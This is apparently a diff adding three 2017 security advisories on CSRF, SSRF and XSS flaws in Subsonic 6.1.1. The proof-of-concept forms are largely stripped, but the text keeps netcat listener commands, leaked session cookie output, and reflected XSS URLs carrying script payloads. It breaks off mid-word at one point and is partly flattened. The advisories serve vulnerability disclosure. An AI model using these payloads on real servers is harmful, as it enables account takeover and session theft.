+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/SUBSONIC-PASSWORD-RESET-CSRF.txt
+[+] ISR: ApparitionSec
+
+
+
+Vendor:
+================
+www.subsonic.org
+
+
+
+Product:
+===============
+subsonic v6.1.1
+
+Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
+
+
+
+Vulnerability Type:
+=====================
+CSRF - Password Reset
+
+
+
+CVE Reference:
+==============
+CVE-2017-9415
+
+
+
+Security Issue:
+================
+Remote attackers can reset subsonic user account passwords if an authenticated user clicks a malicious link
+or visits an attacker controlled webpage. However, username must be known or guessed.
+
+
+
+
+Exploit/POC:
+=============
+
+
+
+
+
+
+
+
+
+
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+
+Severity:
+=========
+High
+
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification: May 29, 2017
+Vendor Acknowledgement: May 30, 2017
+June 4, 2017 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/platforms/windows/webapps/42118.txt b/platforms/windows/webapps/42118.txt
new file mode 100755
index 000000000..d6fcd207e
--- /dev/null
+++ b/platforms/windows/webapps/42118.txt
@@ -0,0 +1,117 @@
+[+] Credits: John Page a.k.a hyp3rlinx
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/SUBSONIC-CSRF-SERVER-SIDE-REQUEST-FORGERY.txt
+[+] ISR: ApparitionSec
+
+
+Vendor:
+================
+www.subsonic.org
+
+
+
+Product:
+===============
+subsonic v6.1.1
+
+Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
+
+
+
+Vulnerability Type:
+==================================
+CSRF - Server Side Request Forgery
+
+
+
+CVE Reference:
+==============
+CVE-2017-9413
+
+
+
+Security Issue:
+================
+Remote attackers can abuse the Podcast feature of subsonic to launch Server Side Request Forgery attacks on the internal network
+or to the internet if an authenticated user clicks a malicious link or visits an attacker controlled webpage. SSRF can be used to
+bypass Firewall restriction on LAN.
+
+e.g
+
+nc.exe -llvp 1337
+listening on [any] 1337 ...
+
+connect to [127.0.0.1] from USER-PC [127.0.0.1] 64428
+GET / HTTP/1.1
+Cache-Control: no-cache
+Pragma: no-cache
+User-Agent: Java/1.8.0_45
+Host: 127.0.0.1:1337
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: keep-alive
+
+
+Exploit/POC:
+=============
+nc.exe -llvp 1337
+listening on [any] 1337 ...
+
+
+1) Subscribe to Podcast CSRF Persistent SSRF
+
+
+
+
+
+
+
+
+nc.exe -llvp 5555
+listening on [any] 5555 ...
+
+
+2) Interet Radio Settings CSRF Persistent SSRF
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+Severity:
+=========
+High
+
+
+
+Disclosure Timeline:
+==================================
+Vendor Notification: May 29, 2017
+Vendor Acknowledgement: May 30, 2017
+June 4, 2017 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not respons_placeholder_
@@ -0,0 +1,96 @@ +[+] Credits: John Page a.k.a hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/SUBSONIC-CSRF-PERSISTENT-XSS.txt +[+] ISR: ApparitionSec + + +Vendor: +================ +www.subsonic.org + + + +Product: +=============== +subsonic v6.1.1 + +Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection. + + + +Vulnerability Type: +====================== +CSRF - Persistent XSS + + + +CVE Reference: +============== +CVE-2017-9414 + + + +Security Issue: +================ +Remote attackers can abuse the Subscribe to Podcast feature of subsonic to store persistent XSS payloads +if an authenticated user clicks a malicious link or visits an attacker controlled webpage. + + + +Exploit/POC: +============= +
+ + + +
+ +Then visit http://localhost:4040/index.view + +HTTP Response: +XSS JSESSIONID=1n631ex230ljs; player-61646d696e=1; DWRSESSIONID=!hqFsK!BCyup7gBQU8spRLvw0tBacefl9Nl + + +Misc Reflected: + +XSS 1 +http://localhost:4040/avatar.view?id=%3Cscript%3Ealert(document.cookie)%3C/script%3E + +XSS 2 +http://localhost:4040//userChart.view?type=%3Cscript%3Ealert(document.cookie)%3C/script%3E + +XSS 3 +http://localhost:4040/coverArt.view?size=%3Cscript%3Ealert(123)%3C/script%3E + + + +Network Access: +=============== +Remote + + + + +Severity: +========= +High + + + +Disclosure Timeline: +================================== +Vendor Notification: May 29, 2017 +Vendor Acknowledgement: May 30, 2017 +June 4, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file